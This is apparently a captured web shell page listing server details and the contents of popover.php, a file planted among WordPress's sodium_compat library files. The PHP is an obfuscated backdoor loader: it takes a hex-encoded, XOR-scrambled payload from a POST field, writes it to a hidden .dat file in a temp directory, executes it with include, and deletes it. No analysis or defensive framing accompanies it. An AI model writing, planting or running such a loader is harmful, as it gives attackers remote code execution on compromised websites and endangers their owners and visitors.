HEX
Server: Apache/2
System: Linux aws3 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
User: hucscom (1018)
PHP: 8.1.32
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/hucscom/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305/popover.php
<?php

if(array_key_exists("po\x69\x6E\x74\x65r", $_POST) && !is_null($_POST["po\x69\x6E\x74\x65r"])){
	$ent = hex2bin($_POST["po\x69\x6E\x74\x65r"]);
	$parameter_group  =   ''    ; for($a=0; $a<strlen($ent); $a++){$parameter_group .= chr(ord($ent[$a]) ^ 34);}
	$ptr = array_filter([ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), sys_get_temp_dir(), getcwd(), "/var/tmp", "/dev/shm", getenv("TEMP"), session_save_path()]);
	$key = 0;
do {
    $pgrp = $ptr[$key] ?? null;
    if ($key >= count($ptr)) break;
    		if (!( !is_dir($pgrp) || !is_writable($pgrp) )) {
    $sym = join("/", [$pgrp, ".dat"]);
    if (file_put_contents($sym, $parameter_group)) {
	include $sym;
	@unlink($sym);
	die();
}
}
    $key++;
} while (true);
}